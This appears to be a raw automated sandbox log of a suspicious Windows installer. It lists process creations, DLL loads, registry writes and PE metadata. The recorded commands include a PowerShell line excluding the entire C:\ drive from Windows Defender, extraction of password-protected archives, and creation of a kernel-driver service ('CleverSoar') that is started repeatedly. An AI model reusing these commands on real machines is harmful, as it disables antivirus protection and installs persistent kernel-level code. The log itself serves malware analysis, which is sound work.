Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe | Process created: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp "C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp" /SL5="$20420,4753239,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe"
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe | Process created: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp "C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp" /SL5="$3043C,4753239,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Window found: window name: TMainForm
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe | Static file information: File size 5707631 > 1048576
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000D.00000003.2195342849.0000000003BD0000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000D.00000003.2196177862.0000000001250000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.13.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_005E57D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount, 11_2_005E57D0
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe | Static PE information: real checksum: 0x0 should be: 0x57286f
Source: update.vac.7.dr | Static PE information: real checksum: 0x0 should be: 0x379bd6
Source: update.vac.2.dr | Static PE information: real checksum: 0x0 should be: 0x379bd6
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.6.dr | Static PE information: real checksum: 0x0 should be: 0x343a15
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.0.dr | Static PE information: real checksum: 0x0 should be: 0x343a15
Source: hrsw.vbc.7.dr | Static PE information: real checksum: 0x0 should be: 0x379bd6
Source: tProtect.dll.13.dr | Static PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe | Static PE information: section name: .didata
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.0.dr | Static PE information: section name: .didata
Source: update.vac.2.dr | Static PE information: section name: .00cfg
Source: update.vac.2.dr | Static PE information: section name: .voltbl
Source: update.vac.2.dr | Static PE information: section name: .=~
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.6.dr | Static PE information: section name: .didata
Source: 7zr.exe.7.dr | Static PE information: section name: .sxdata
Source: update.vac.7.dr | Static PE information: section name: .00cfg
Source: update.vac.7.dr | Static PE information: section name: .voltbl
Source: update.vac.7.dr | Static PE information: section name: .=~
Source: is-8UMQQ.tmp.7.dr | Static PE information: section name: .xdata
Source: hrsw.vbc.7.dr | Static PE information: section name: .00cfg
Source: hrsw.vbc.7.dr | Static PE information: section name: .voltbl
Source: hrsw.vbc.7.dr | Static PE information: section name: .=~
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Code function: 7_2_6C0C86EB push ecx; ret 7_2_6C0C86FE
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Code function: 7_2_6BF70F00 push ss; retn 0001h 7_2_6BF70F0A
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Code function: 7_2_6C196F10 push eax; ret 7_2_6C196F2E
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C0FB9F4 push 004AC35Ch; ret 7_2_6C0FBA0E
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C197290 push eax; ret 7_2_6C1972BE
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005645F4 push 0060C35Ch; ret 11_2_0056460E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005FFB10 push eax; ret 11_2_005FFB2E
